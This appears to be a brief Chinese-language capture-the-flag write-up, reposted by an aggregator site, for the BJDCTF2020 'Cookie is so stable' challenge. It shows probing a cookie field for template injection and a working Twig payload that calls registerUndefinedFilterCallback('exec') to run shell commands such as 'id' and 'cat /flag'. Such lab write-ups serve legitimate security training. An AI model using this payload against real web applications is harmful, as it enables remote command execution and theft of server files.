[BJDCTF2020]Cookie is so stable
Posted mech
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[BJDCTF2020]Cookie is so stable相关的知识,希望对你有一定的参考价值。
知识点
- SSTI
- twig
题目提示cookie
在user处尝试注入
{{7*‘7‘}} 回显7777777 ==> Jinja2
{{7*‘7‘}} 回显49 ==> Twig
这里为Twig
payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
获取flag
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
以上是关于[BJDCTF2020]Cookie is so stable的主要内容,如果未能解决你的问题,请参考以下文章
[BJDCTF2020]Cookie is so stable